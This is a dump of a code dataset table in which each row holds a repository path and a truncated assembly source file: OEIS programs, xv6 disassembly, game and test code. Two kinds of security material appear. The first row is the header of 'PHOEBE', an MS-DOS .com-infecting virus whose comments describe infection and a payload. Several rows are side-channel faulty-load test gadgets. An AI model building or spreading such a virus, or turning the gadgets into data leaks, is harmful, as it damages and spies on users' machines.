max_stars_repo_path stringlengths 3 255 | max_stars_repo_name stringlengths 5 116 | max_stars_count int64 0 107k | id stringlengths 1 7 | content stringlengths 63 1.05M |
|---|---|---|---|---|
MSDOS/Virus.MSDOS.Unknown.phoebe.asm | fengjixuchui/Family | 3 | 43684 | <filename>MSDOS/Virus.MSDOS.Unknown.phoebe.asm
;PHOEBE
;coded by Opic of the Codebreakers
;PHOEBE is an appending .com infector with DT via a dotdot routine
;infection criteria is met on a moday once all files that are capable of
;being infected by PHOEBE are, a payload is delivered:
;the monitor will print a messa... |
Transynther/x86/_processed/AVXALIGN/_st_sm_/i7-7700_9_0xca_notsx.log_21829_284.asm | ljhsiun2/medusa | 9 | 43685 | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r12
push %r15
push %rbp
push %rcx
push %rdi
push %rsi
lea addresses_A_ht+0x9b15, %rsi
lea addresses_WC_ht+0x5447, %rdi
nop
nop
nop
nop
nop
sub %r10, %r10
mov $46, %rcx
rep movsw
nop
nop
nop
nop
xor $10479, %r12
lea addresses_WC_ht+0x9103, %r15
nop
nop
add %rb... |
programs/oeis/269/A269442.asm | neoneye/loda | 22 | 43688 | <filename>programs/oeis/269/A269442.asm
; A269442: a(n) = n*(n^8 + 1)*(n^4 + 1)*(n^2 + 1)*(n + 1) + 1.
; 1,17,131071,64570081,5726623061,190734863281,3385331888947,38771752331201,321685687669321,2084647712458321,11111111111111111,50544702849929377,201691918794585181,720867993281778161,2345488209948553531,70375803811209... |
programs/oeis/118/A118667.asm | neoneye/loda | 22 | 43689 | ; A118667: a(n) = a(n-1)+ ((abs(2^a(n-1)*a(n-1)) mod 10).
; 0,1,3,7,13,19,21,23,27,33,39,41,43,47,53,59,61,63,67,73,79,81,83,87,93,99,101,103,107,113,119,121,123,127,133,139,141,143,147,153,159,161,163,167,173,179,181,183,187,193,199,201,203,207,213,219,221,223,227,233
mov $5,$0
mov $6,$0
lpb $5
mov $0,$6
sub $5,1... |
programs/oeis/186/A186329.asm | karttu/loda | 1 | 43690 | ; A186329: Adjusted joint rank sequence of (f(i)) and (g(j)) with f(i) before g(j) when f(i)=g(j), where f and g are the pentagonal numbers and the hexagonal numbers. Complement of A186328.
; 2,4,6,8,10,12,14,17,19,21,23,25,27,30,32,34,36,38,40,42,45,47,49,51,53,55,58,60,62,64,66,68,70,73,75,77,79,81,83,86,88,90,92,94... |
oeis/142/A142524.asm | neoneye/loda-programs | 11 | 43691 | <filename>oeis/142/A142524.asm
; A142524: Primes congruent to 35 mod 52.
; Submitted by <NAME>(s4)
; 139,191,347,503,607,659,919,971,1231,1283,1439,1543,1699,1907,2011,2063,2531,2687,2791,2843,2999,3259,3467,3571,3623,3727,3779,4091,4507,4663,4871,5443,5651,5807,6067,6379,6691,6899,7159,7211,7523,8147,8563,8719,9187,92... |
src/obstacle.asm | Gegel85/SpaceShooterGB | 3 | 43692 | ; Spawn an obstacle but not always
spawnObstacles:
ld a,[BOSS_STATUS]
or a
ret nz
ld a, [ASTEROID_SPAWN_IN]
or a
call z, updateSpawnTimer
dec a
ld [ASTEROID_SPAWN_IN], a
ret
updateSpawnTimer::
ld de, 1
call addScore
ld b, 0
call random
and %01111111
add $8
ld c, a
call createObstacle
call random
... |
src/test/ref/literal-strings.asm | jbrandwood/kickc | 2 | 43694 | // Tests literal strings with and without zero-termination
// Commodore 64 PRG executable file
.file [name="literal-strings.prg", type="prg", segments="Program"]
.segmentdef Program [segments="Basic, Code, Data"]
.segmentdef Basic [start=$0801]
.segmentdef Code [start=$80d]
.segmentdef Data [startAfter="Code"]
.segme... |
Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0.log_21829_1229.asm | ljhsiun2/medusa | 9 | 43696 | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r14
push %r15
push %r9
push %rcx
push %rdi
push %rsi
lea addresses_D_ht+0x1389b, %rsi
lea addresses_normal_ht+0x1c01b, %rdi
nop
nop
nop
nop
and $19117, %r14
mov $86, %rcx
rep movsw
nop
nop
nop
nop
nop
add $21110, %r9
lea addresses_WC_ht+0xe9b3, %r15
nop
xor %... |
cgi/exemplo_cgi.asm | XCaminhante/tutoriais-e-exemplos | 15 | 43697 | <filename>cgi/exemplo_cgi.asm
format elf executable 3
entry início
include 'proc32.inc'
include 'symbols.inc'
struc texto txt {
.txt db txt
.tam = $-.txt
}
macro write dest,txt {
push eax ebx ecx edx
mov eax, sys_write
mov ebx, dest
mov ecx, txt
mov edx, txt#.tam
int 80h
pop edx ecx ebx eax
}
macr... |
src/u2/p26.asm | luishendrix92/lenguajezinterfaz | 0 | 43698 | ; 26 - Realizar alguna operación con el operador AND (lógico)
; <NAME>
; 15211312
; 14 de Octubre del 2018
.model small
.stack 64
.data
num db 01000110b ; 70 ó 'F'
resta db 11111001b ; Negar el 2ndo y 3er bit de 70
; Dado que negar dichos bits es igual que restar 6
; El resutlado es 70-6 = 64 ó '@' el cual... |
dv3/qlf/ldwa.asm | olifink/smsqe | 0 | 43699 | ; DV3 QLWA Format Load File V3.00 1994 <NAME> QJUMP
section dv3
xdef qlf_ldwa
xref dv3_sload
xref dv3_sbloc
include 'dev8_keys_qlwa'
include 'dev8_dv3_keys'
include 'dev8_dv3_qlf_keys'
include 'dev8_keys_err'
;+++
; DV3 QLWA format load file.
; It checks whether the first sector of a file is in slav... |
build/config/aom_config.asm | gomezpirry/aom | 0 | 43700 | ;
; Copyright (c) 2019, Alliance for Open Media. All rights reserved
;
; This source code is subject to the terms of the BSD 2 Clause License and
; the Alliance for Open Media Patent License 1.0. If the BSD 2 Clause License
; was not distributed with this source code in the LICENSE file, you can
; obtain it at www.aome... |
LKS/MC_Joypad.asm | Kannagi/Super-Kannagi-Sound | 11 | 43701 |
.MACRO joypad_event
lda \3 ; read joypad
bit #\1
bne +
stz LKS_STDCTRL + \2
bra ++
+:
lda LKS_STDCTRL + \2
cmp #$00
bne +
lda #01
sta LKS_STDCTRL + \2
bra ++
+:
lda #02
sta LKS_STDCTRL + \2
++:
.ENDM
.DEFINE _A $00
.DEFINE _B $01
.DEFINE _Y $02
.DEFINE _X $03
.DEFINE _L $0... |
oeis/120/A120758.asm | neoneye/loda-programs | 11 | 43702 | ; A120758: The (1,3)-entry in the matrix M^n, where M is the 3 X 3 matrix [0,2,1; 2,1,2; 1,2,2] (n>=1).
; Submitted by <NAME>
; 1,6,25,116,517,2338,10517,47400,213481,961726,4332145,19515036,87908397,395998298,1783838637,8035595600,36197658961,163058307446,734522939465,3308779311556,14904940203477,67141752851858
mov $... |
oeis/281/A281860.asm | neoneye/loda-programs | 11 | 43703 | ; A281860: Curious identities based on the Armstrong number 371 = A005188(12).
; Submitted by <NAME>(s3)
; 371,336701,333667001,333366670001,333336666700001,333333666667000001,333333366666670000001,333333336666666700000001,333333333666666667000000001,333333333366666666670000000001,333333333336666666666700000000001,3333... |
software/pic/marinegps_bmc.asm | mbouyer/marine_chartplotter | 3 | 43704 | <reponame>mbouyer/marine_chartplotter
;
; Copyright (c) 2016 <NAME>.
;
; Redistribution and use in source and binary forms, with or without
; modification, are permitted provided that the following conditions
; are met:
; 1. Redistributions of source code must retain the above copyright
; notice, this list of condit... |
libsrc/osca/get_volume_list.asm | jpoikela/z88dk | 640 | 43705 | ;
; Old School Computer Architecture - interfacing FLOS
; <NAME>, 2011
;
; Get current volume
;
; $Id: get_volume_list.asm,v 1.3 2016-06-22 22:13:09 dom Exp $
;
INCLUDE "target/osca/def/flos.def"
SECTION code_clib
PUBLIC get_volume_list
PUBLIC _get_volume_list
defc get_volume_list = kjt_get_volume_i... |
Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0.log_21829_550.asm | ljhsiun2/medusa | 9 | 43707 | <filename>Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0.log_21829_550.asm<gh_stars>1-10
.global s_prepare_buffers
s_prepare_buffers:
push %r12
push %r13
push %r14
push %r15
push %r8
push %rcx
push %rdi
push %rsi
lea addresses_A_ht+0x16064, %rsi
lea addresses_A_ht+0xd034, %rdi
nop
nop
nop
sub %r15, %r15
mov $83,... |
secd/support.asm | bwkimmel/secd | 13 | 43708 | <reponame>bwkimmel/secd
; ==============================================================================
; Support Functions
;
; This file contains procedures to read and print characters, LispKit Lisp
; tokens and expressions.
; ==============================================================================
;
%include ... |
Appendix E - Microcontroller Code/Redundant/Old CSMA Method.asm | liwenyip/adhoc | 0 | 43709 | <reponame>liwenyip/adhoc
; ---------------------------------------------------------
; Media is busy, set a random timeout with exponential backoff.
_CSMA_WAIT:
tstfsz retry_count ; Is this the first time we have tried to transmit?
bra _CSMA_RETRY ; NO
_CSMA_FIRST_TRY:
; We want to set a random timeout, bu... |
data/pokemon/dex_entries/manaphy.asm | AtmaBuster/pokeplat-gen2 | 6 | 43710 | <reponame>AtmaBuster/pokeplat-gen2
db "SEAFARING@" ; species name
db "It starts life"
next "with a wondrous"
next "power that permits"
page "it to bond with"
next "any kind of"
next "#MON.@"
|
Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0xca_notsx.log_21829_220.asm | ljhsiun2/medusa | 9 | 43711 | <reponame>ljhsiun2/medusa
.global s_prepare_buffers
s_prepare_buffers:
ret
.global s_faulty_load
s_faulty_load:
push %r11
push %r12
push %r13
push %r8
push %rcx
push %rdi
push %rdx
// Store
lea addresses_RW+0x1f6cf, %rdx
inc %r8
mov $0x5152535455565758, %r13
movq %r13, %xmm0
vmovups %ymm0, (%rdx)
nop
nop
nop
nop
... |
libsrc/graphics/px8/w_stencil_render.asm | jpoikela/z88dk | 640 | 43712 | <reponame>jpoikela/z88dk<gh_stars>100-1000
;
; z88dk GFX library for the PX8
;
; Render the "stencil".
; The dithered horizontal lines base their pattern on the Y coordinate
; and on an 'intensity' parameter (0..11).
; Basic concept by <NAME>
;
; Machine code version by <NAME>, 22/4/2009
;
; stencil_render(unsigned ch... |
programs/oeis/127/A127712.asm | neoneye/loda | 22 | 43713 | ; A127712: Row sums of the inverse of the triangle A(n,k) = 1/F(n+1) if k <= n <= 2k, 0 otherwise.
; 1,1,1,2,2,4,5,10,13,23,34,59,89,149,233,387,610,1000,1597,2607,4181,6799,10946,17770,28657,46457,75025,121542,196418,318044,514229,832427,1346269,2178919,3524578,5703887,9227465,14931949,24157817,39090776
mov $4,$0
mov... |
target/cos_117/disasm/iop_overlay1/CLKSNC.asm | jrrk2/cray-sim | 49 | 43714 | <filename>target/cos_117/disasm/iop_overlay1/CLKSNC.asm
0x0000 (0x000000) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0001 (0x000002) 0x2918- f:00024 d: 280 | OR[280] = A
0x0002 (0x000004) 0x2919- f:00024 d: 281 | OR[281] = A
0x0003 (0x000006) 0x291A... |
oeis/272/A272532.asm | neoneye/loda-programs | 11 | 43715 | <gh_stars>10-100
; A272532: Single bit representation of the sum of two sinusoids with periods 2 and 2*sqrt(2).
; Submitted by <NAME>(s3)
; 1,0,1,1,0,1,1,0,1,0,0,1,0,0,1,0,1,1,0,1,1,0,1,1,0,1,0,0,1,0,0,1,0,1,1,0,1,1,0,1,1,0,1,0,0,1,0,0,1,0,1,1,0,1,1,0,1,0,0,1,0,0,1,0,0,1,0,1,1,0,1,1,0,1,0,0,1,0,0,1,0,0,1,0,1,1,0,1,1,0,... |
Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_21829_1672.asm | ljhsiun2/medusa | 9 | 43716 | <gh_stars>1-10
.global s_prepare_buffers
s_prepare_buffers:
push %r12
push %r13
push %rax
push %rcx
push %rdi
push %rsi
lea addresses_normal_ht+0x12a68, %rcx
nop
and %rax, %rax
movw $0x6162, (%rcx)
nop
nop
nop
nop
nop
inc %r12
lea addresses_normal_ht+0x103e8, %rsi
lea addresses_A_ht+0xd45c, %rdi
nop
nop
and %r13, %r13
... |
7floors_ml_part.asm | absayuti/7floors | 0 | 43717 | <gh_stars>0
;===============================================================================
; Project : 7 Floors a.k.a JumpMan
; Target : Commodore 64
; Comments : Machine Language (ML) Code to move the barrels
; Author : ABSHMS June 2021
;=================================================================... |
Transynther/x86/_processed/AVXALIGN/_zr_/i7-7700_9_0x48.log_21829_480.asm | ljhsiun2/medusa | 9 | 43718 | <reponame>ljhsiun2/medusa
.global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r8
push %rax
push %rcx
push %rdi
push %rsi
lea addresses_A_ht+0xae59, %rcx
clflush (%rcx)
nop
and %rax, %rax
vmovups (%rcx), %ymm5
vextracti128 $0, %ymm5, %xmm5
vpextrq $1, %xmm5, %r8
nop
nop
nop
nop
nop
and %r10, %r10
lea addresses_... |
programs/oeis/100/A100316.asm | jmorken/loda | 1 | 43719 | ; A100316: Number of 4 X n 0-1 matrices avoiding simultaneously the right angled numbered polyomino patterns (ranpp) (00;1), (01;0), (10;0) and (01;1).
; 1,16,24,34,48,70,108,178,312,574,1092,2122,4176,8278,16476,32866,65640,131182,262260,524410,1048704,2097286,4194444,8388754,16777368,33554590,67109028,134217898,26843... |
basic/src/commands/let.asm | paulscottrobson/eris | 13 | 43720 | ; *****************************************************************************
; *****************************************************************************
;
; Name: let.asm
; Purpose: Assignment statement
; Created: 4th March 2020
; Reviewed: 16th March 2020
; Author: <NAME> (<EMAIL>)
;
; *****************... |
programs/oeis/082/A082296.asm | karttu/loda | 1 | 43721 | <gh_stars>1-10
; A082296: Solutions to 13^x+17^x == 19 mod 23.
; 12,20,34,42,56,64,78,86,100,108,122,130,144,152,166,174,188,196,210,218,232,240,254,262,276,284,298,306,320,328,342,350,364,372,386,394,408,416,430,438,452,460,474,482,496,504,518,526,540,548,562,570,584,592,606,614,628,636,650,658,672,680,694,702,716,724... |
Transynther/x86/_processed/AVXALIGN/_st_zr_un_4k_/i9-9900K_12_0xca.log_60_844.asm | ljhsiun2/medusa | 9 | 43722 | .global s_prepare_buffers
s_prepare_buffers:
push %r15
push %r9
push %rbp
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_normal_ht+0x90f0, %rsi
lea addresses_normal_ht+0x1ad50, %rdi
nop
nop
nop
and $49497, %rbp
mov $35, %rcx
rep movsl
nop
nop
nop
cmp $16216, %rdx
lea addresses_D_ht+0x3158, %r9
nop
nop
nop
dec %r... |
asm/runprgm.asm | beckadamtheinventor/runprogram | 2 | 43723 |
public _run_program
extern __exitsp
; include 'include/ez80.inc'
include 'include/ti84pceg.inc'
_run_program:
call ti._frameset0
ld hl,(ix+6)
ld a,(ix+9)
ld de,$E30900
ld (de),a
inc de
ld bc,8
ldir
ld hl,(ix+12)
ld a,(ix+15)
ld de,$E30910
ld (de),a
inc de
ld c,8
ldir
ld sp,(__exitsp)
pop iy ; iy = ... |
ls.asm | jahzielv/xv6-net | 0 | 43724 | <gh_stars>0
_ls: file format elf32-i386
Disassembly of section .text:
00000000 <fmtname>:
#include "user.h"
#include "fs.h"
char*
fmtname(char *path)
{
0: 55 push %ebp
1: 89 e5 mov %esp,%ebp
3: 53 push %ebx
4: 83 ec 14 ... |
oeis/037/A037617.asm | neoneye/loda-programs | 11 | 43725 | <gh_stars>10-100
; A037617: Decimal expansion of a(n) is given by the first n terms of the periodic sequence with initial period 1,3,2.
; Submitted by <NAME>
; 1,13,132,1321,13213,132132,1321321,13213213,132132132,1321321321,13213213213,132132132132,1321321321321,13213213213213,132132132132132,1321321321321321
lpb $0
... |
src/modules/applications/hello_world/hello_world.asm | nothotscott/VisualOS | 28 | 43726 | <filename>src/modules/applications/hello_world/hello_world.asm<gh_stars>10-100
SECTION .rodata
string1: db "Hello, world!", 10,0
SECTION .text
GLOBAL _start
_start:
; Stack test
push 0x80
push 0x123
pop rax
pop rax
cmp rax, 0x80
jne 0x0
; Text output syscall test
mov rax, 1
mov rdi, 1
mov rsi, str... |
Application/AssemblyCode/working_and_tmp_asm_files/logo.asm | t0ddpar0dy/Handmade_Pacman | 0 | 43727 | //logo loop
LUI 63 r0 // top left most frame buffer address
ORI 255 r0
ADDI -106 r0 // offset 2 rows
ADDI -2 r0 // offset 2 columns
MOV r0 r4 // save for new row writes
LUI 1 r1 // glyph number (315)
ORI 59 r1
MOVI 0 r2 // row counter
MOVI 0 r3 // column counter
logo_column:
CMPI 8 r2 // counter
BEQ l... |
Charset/UTF-16LE/test UTF-16LE.asm | zummenix/asm-projects | 1 | 43729 |
format PE GUI 4.0
include 'win32w.inc'
stdcall FileToMemory,_file_name,_file_buffer,60
test eax,eax
je .exit
stdcall UTF16LE_TO_UTF8,_file_buffer,_buffer,100h,1
test eax,eax
je .exit
stdcall MemoryToFile,_out_file_name,_buffer,38
... |
lights.asm | nanochess/lights | 12 | 43730 | ;
; Follow the lights
;
; by <NAME>.
;
; Creation date: Jan/16/2020.
; Revision date: Jan/17/2020.
; Added victory tune after 31 good lights.
;
;
; Very useful info gathered from:
; https://www.waitingforfriday.com/?p=586
;
cpu 8086
%ifdef com_file
org 0x0100
%else
org 0x7c00
... |
Appl/SDK_Asm/no_go/SndPlay/sndplayManager.asm | steakknife/pcgeos | 504 | 43731 | COMMENT @----------------------------------------------------------------------
Copyright (c) GeoWorks 1992 -- All Rights Reserved
PROJECT: PC GEOS
MODULE: SndPlay (Sample PC GEOS application)
FILE: sndplay.asm
REVISION HISTORY:
Name Date Description
---- ---- -----------
Eric 6/1/92 Initial vers... |
masum2.asm | istiakbinmahmod/Xv6 | 0 | 43732 |
_masum2: file format elf32-i386
Disassembly of section .text:
00000000 <main>:
check((ticks_high_after-ticks_high_before)*20 < ticks_low_after - ticks_low_before, "Expected the process with high tickets to get fewer ticks than the process with low tickets due to the former sleeping");
}
int
main(int argc, cha... |
sw/552tests/rand_simple/t_3_seq.asm | JPShen-UWM/ThreadKraken | 1 | 43734 | // seed 3
lbi r0, 25 // icount 0
slbi r0, 157 // icount 1
lbi r1, 29 // icount 2
slbi r1, 116 // icount 3
lbi r2, 228 // icount 4
slbi r2, 237 // icount 5
lbi r3, 187 // icount 6
slbi r3, 2 // icount 7
lbi r4, 195 // icount 8
slbi r4, 35 // icount 9
lbi r5, 124 // icount 10
slbi r5, 112 // icount 11
lbi r6, 109 // icou... |
operating_sys/nice.asm | jasper-lov/waterville_os | 0 | 43736 | <reponame>jasper-lov/waterville_os
_nice: file format elf32-i386
Disassembly of section .text:
00000000 <main>:
#include "user.h"
#include "fcntl.h"
extern int chpr(int,int);
int main(int argc, char *argv[]) {
0: 8d 4c 24 04 lea 0x4(%esp),%ecx
4: 83 e4 f0 and $0xfffffff0,%es... |
bank2.asm | robinfaury/LudumDare48_Deeper | 1 | 43737 | <reponame>robinfaury/LudumDare48_Deeper<filename>bank2.asm
SECTION "intro", ROMX[$4000], BANK[2]
SetupLvl_Bank2:
call LCD_Stop
ld a, 1
ld [rVRAM_BANK], a
ld a, %00000101
ld hl, _SCRN0
ld bc, 32*32
call mem_Set
ld a, 0
ld [rVRAM_BANK], a
ld hl, intro_tiles_Bank2
ld de, _VRAM
ld bc, intro_tiles_end_Bank2-... |
libsrc/_DEVELOPMENT/adt/p_queue/z80/asm_p_queue_empty.asm | jpoikela/z88dk | 640 | 43738 |
; ===============================================================
; Feb 2014
; ===============================================================
;
; int p_queue_empty(p_queue_t *q)
;
; Return true (non-zero) if queue is empty.
;
; ===============================================================
SECTION code_clib
SECTIO... |
oeis/008/A008499.asm | neoneye/loda-programs | 11 | 43739 | <reponame>neoneye/loda-programs<filename>oeis/008/A008499.asm<gh_stars>10-100
; A008499: Number of 5-dimensional centered tetrahedral numbers.
; 1,7,28,84,210,462,923,1709,2975,4921,7798,11914,17640,25416,35757,49259,66605,88571,116032,149968,191470,241746,302127,374073,459179,559181,675962,811558,968164,1148140,135401... |
programs/oeis/004/A004221.asm | jmorken/loda | 1 | 43740 | <gh_stars>1-10
; A004221: 10*log_10 (n) rounded up.
; 0,4,5,7,7,8,9,10,10,10,11,11,12,12,12,13,13,13,13,14,14,14,14,14,14,15,15,15,15,15,15,16,16,16,16,16,16,16,16,17,17,17,17,17,17,17,17,17,17,17,18,18,18,18,18,18,18
add $0,1
pow $0,10
sub $0,1
mov $1,1
lpb $0
div $0,10
add $1,1
lpe
sub $1,1
|
engine/battle/move_effects/disable.asm | AtmaBuster/pokeplat-gen2 | 6 | 43741 | <reponame>AtmaBuster/pokeplat-gen2
BattleCommand_disable:
; disable
ld a, [wAttackMissed]
and a
jr nz, .failed
ld de, wEnemyDisableCount
ld hl, wEnemyMonMoves
ldh a, [hBattleTurn]
and a
jr z, .got_moves
ld de, wPlayerDisableCount
ld hl, wBattleMonMoves
.got_moves
ld a, [de]
and a
jr nz, .failed
ld a, ... |
Src/Ant32/Tests/ant32/arith/div.asm | geoffthorpe/ant-architecture | 0 | 43743 | #@tests div
lc r3, 5
lc r4, 10
div r5, r4, r3
div r6, r3, r5 #fractional
div r0, r3, r0 #div-by-0 exception
|
src/9os.asm | Mario-Kart-Felix/9os | 13 | 43744 | <filename>src/9os.asm
;-----------------------------------------------------------------------------------------------------
;
; 9os by <NAME> & <NAME>
;
;-----------------------------------------------------------------------------------------------------
;--------------------------------------------
; Load bin... |
src/test_ram.asm | pwk4m1/TinyBIOS | 23 | 43745 | <filename>src/test_ram.asm
; BSD 3-Clause License
;
; Copyright (c) 2019, k4m1 <<EMAIL>>
; All rights reserved.
;
; Redistribution and use in source and binary forms, with or without
; modification, are permitted provided that the following conditions are met:
;
; * Redistributions of source code must retain the abo... |
source/modules/basic/tokenise/tokseq.asm | paulscottrobson/mega-basic | 3 | 43746 | ; *******************************************************************************************
; *******************************************************************************************
;
; Name : tokseq.asm
; Purpose : Tokenise ASCII string sequences.
; Date : 2nd September 2019
; Author : <NAME> (<EMAIL>)
;... |
oeis/312/A312963.asm | neoneye/loda-programs | 11 | 43747 | ; A312963: Coordination sequence Gal.6.153.2 where G.u.t.v denotes the coordination sequence for a vertex of type v in tiling number t in the Galebach list of u-uniform tilings.
; Submitted by <NAME>
; 1,4,9,13,18,24,29,34,40,45,49,54,58,62,67,71,76,82,87,92,98,103,107,112,116,120,125,129,134,140,145,150,156,161,165,17... |
tests/stack_and_math/equation_with_indent.asm | UPB-FILS-ALF/devoir-1-tests | 0 | 43748 | <filename>tests/stack_and_math/equation_with_indent.asm<gh_stars>0
push 1
push 2
add
print
push 7
div
print
push 3
stack
push 10
push 5
mul
print
sub
print
push 3
mod
stack
push 5
add
stack
print
|
oeis/197/A197709.asm | neoneye/loda-programs | 11 | 43749 | ; A197709: Floor((n+1/n)^8)
; Submitted by <NAME>(s3)
; 256,1525,15241,106441,534597,2091239,6776036,18992710,47486563,108285670,228948163,454458310,855154435,1537112038,2655445795,4431034438,7171212835,11295015910,17363599363,26116502470,38514458563,55789499110,79503137635,111613460038,154551988195,211311224038,285543... |
coreboot/src/vendorcode/amd/agesa/f14/Proc/CPU/cahalt64.asm | leetobin/firebrick | 9 | 43750 | ;/**
; * @file
; *
; * Agesa pre-memory miscellaneous support, including ap halt loop.
; *
; * @xrefitem bom "File Content Label" "Release Content"
; * @e project: AGESA
; * @e sub-project: CPU
; * @e \$Revision: 10071 $ @e \$Date: 2008-12-16 18:03:04 -0600 (Tue, 16 Dec 2008) $
; */
;***************************... |
test/unittest_rule_3.asm | muellevin/RARS_Game_of_Life | 1 | 43752 | <reponame>muellevin/RARS_Game_of_Life
# here i am testing the third rule
# there is a more efficient wayy to test it with loops. But thats faster to do and easier to understand
.include "../src/constants_settings.asm"
# at this point it is not a mather where the cell is. i will check the status bit
li a1, 0 # i ha... |
S4/HW_Lab/Practice_Lab4/Q5.asm | akxavier/Assignments | 0 | 43753 | <reponame>akxavier/Assignments<filename>S4/HW_Lab/Practice_Lab4/Q5.asm
;count number of spaces in a string
section .data
msg1 : db 'Enter string : '
l1 : equ $-msg1
msg2 : db 'Number of spaces in the string is '
l2 : equ $-msg2
newline : db 10
section .bss
string : resb 50
temp : resb 1
strlen : resb 1
space_count : ... |
Transynther/x86/_processed/AVXALIGN/_st_sm_/i9-9900K_12_0xca.log_21829_197.asm | ljhsiun2/medusa | 9 | 43754 | <gh_stars>1-10
.global s_prepare_buffers
s_prepare_buffers:
ret
.global s_faulty_load
s_faulty_load:
push %r10
push %r12
push %r13
push %r8
push %rcx
push %rdi
push %rdx
// Store
lea addresses_WT+0xde7d, %r8
nop
nop
nop
nop
cmp %r13, %r13
movw $0x5152, (%r8)
cmp $65044, %r13
// Store
lea addresses_PSE+0xe3fd, %r... |
Transynther/x86/_processed/NONE/_st_/i7-8650U_0xd2.log_175_1264.asm | ljhsiun2/medusa | 9 | 43755 | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r15
push %r9
push %rbx
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_A_ht+0xf539, %r15
nop
nop
nop
nop
nop
and $8590, %rdx
mov $0x6162636465666768, %r10
movq %r10, %xmm4
vmovups %ymm4, (%r15)
cmp %rcx, %rcx
lea addresses_WC_ht+0x7939, %rbx
nop
nop
nop... |
aCalculator.asm | kohnewlife/MIPS | 1 | 43757 | # A calculator
# Lab 9
# Data Memory Section
.data
# Program Memory section
.text
.globl start
start:
#a registers are operations
#t values are numbers
addi $a0, $a0, 0x00000079 #add
addi $a1, $a1, 0x0000007B #subtract
addi $a2, $a2, 0x0000007C #multiply
addi $a3, $a3, 0x0000E04A #divide
addi $at, $a... |
oeis/101/A101321.asm | neoneye/loda-programs | 11 | 43758 | <filename>oeis/101/A101321.asm
; A101321: Table T(n,m) = 1 + n*m*(m+1)/2 read by antidiagonals: centered polygonal numbers.
; Submitted by <NAME>
; 1,1,1,1,2,1,1,4,3,1,1,7,7,4,1,1,11,13,10,5,1,1,16,21,19,13,6,1,1,22,31,31,25,16,7,1,1,29,43,46,41,31,19,8,1,1,37,57,64,61,51,37,22,9,1,1,46,73,85,85,76,61,43,25,10,1,1,56,9... |
oeis/075/A075670.asm | neoneye/loda-programs | 11 | 43759 | <reponame>neoneye/loda-programs
; A075670: Sum of next n 9th powers.
; Submitted by <NAME>
; 1,20195,12292965,1561991824,77226633575,2014634387961,33098483802475,383318212734080,3377498614484589,23898971839102975,141290020118952881,719054471032657200,3223613105991831475,12964037775857022869,47453810583528962775,1599822... |
3term/Programming/4/lab.asm | nik-sergeson/bsuir-informatics-labs | 0 | 43760 | <reponame>nik-sergeson/bsuir-informatics-labs<gh_stars>0
.model small
.stack 100h
.data
buf label byte
max db 255
len db 0
source db 255 dup(0)
words db 255 dup(0)
inverse db 255 dup(0)
resultstring db 255 dup(0)
.code
.386
addtoword proc
push di
mov di, bx
nop
nop
stosb
mov bx, di
... |
Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0x48_notsx.log_21829_1866.asm | ljhsiun2/medusa | 9 | 43761 | .global s_prepare_buffers
s_prepare_buffers:
push %r8
push %r9
push %rax
push %rbp
push %rcx
push %rdi
push %rsi
lea addresses_UC_ht+0x1274f, %rsi
lea addresses_normal_ht+0x1182f, %rdi
nop
nop
nop
nop
nop
sub %r8, %r8
mov $14, %rcx
rep movsb
inc %r9
lea addresses_normal_ht+0x100c1, %rsi
lea addresses_D_ht+0x159e1, %rdi... |
mastersystem/zxb-sms-2012-02-23/zxb-sms/wip/zxb/library-asm/print.asm | gb-archive/really-old-stuff | 10 | 43762 | <reponame>gb-archive/really-old-stuff<gh_stars>1-10
; PRINT command routine
; Does not print attribute. Use PRINT_STR or PRINT_NUM for that
#include once <sposn.asm>
#include once <cls.asm>
#include once <in_screen.asm>
#include once <table_jump.asm>
#include once <ink.asm>
#include once <paper.asm>
#include once <fla... |
src/ProxyScrape.asm | Justfr33z/ProxyScrape | 1 | 43764 | <reponame>Justfr33z/ProxyScrape
.386
.model flat, stdcall
option casemap:none
include \masm32\include\msvcrt.inc
include \masm32\include\wininet.inc
include C:\masm32\include\windows.inc
include C:\masm32\include\kernel32.inc
includelib \masm32\lib\msvcrt.lib
includelib \masm32\lib\wininet.lib
includelib C:\masm32\li... |
Driver/Printer/PrintCom/Cursor/cursorPCL4Adjust.asm | steakknife/pcgeos | 504 | 43766 | <reponame>steakknife/pcgeos
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Copyright (c) Berkeley Softworks 1990 -- All Rights Reserved
PROJECT: PC GEOS
MODULE: LaserJet print driver
FILE: cursorPCL4Adjust.asm
AUTHOR: <NAME>
ROUTINES:
Name Description
---- ---... |
P2/01maze.asm | alxzzhou/BUAA_CO_2020 | 1 | 43767 | <reponame>alxzzhou/BUAA_CO_2020
.data
maze: .space 64
visited: .space 64
.macro getdata(%s)
li $v0,5
syscall
move %s,$v0
.end_macro
.macro read
li $v0,5
syscall
.end_macro
.macro free(%s)
li %s,0
.end_macro
.macro done
li $v0,10
syscall
.end_macro
.macro output
li $v0,1
syscall
.end_macro
.macro index(%dest... |
P6/data_P6_2/cal_R_same_test10.asm | alxzzhou/BUAA_CO_2020 | 1 | 43768 | <filename>P6/data_P6_2/cal_R_same_test10.asm
lui $1,6514
ori $1,$1,38214
lui $2,42510
ori $2,$2,31962
lui $3,18523
ori $3,$3,3727
lui $4,17921
ori $4,$4,16489
lui $5,53474
ori $5,$5,9705
lui $6,61390
ori $6,$6,61193
mthi $1
mtlo $2
sec0:
nop
nop
nop
slt $2,$6,$6
sec1:
nop
nop
xor $6,$1,$0
slt $1,$6,$6
sec2:
no... |
libsrc/target/ondra/input/in_Inkey.asm | ahjelm/z88dk | 640 | 43769 | <gh_stars>100-1000
; uint in_Inkey(void)
; Read current state of keyboard
SECTION code_clib
PUBLIC in_Inkey
PUBLIC _in_Inkey
EXTERN in_keytranstbl
; exit : carry set and HL = 0 for no keys registered
; else HL = ASCII character code
; uses : AF,BC,DE,HL
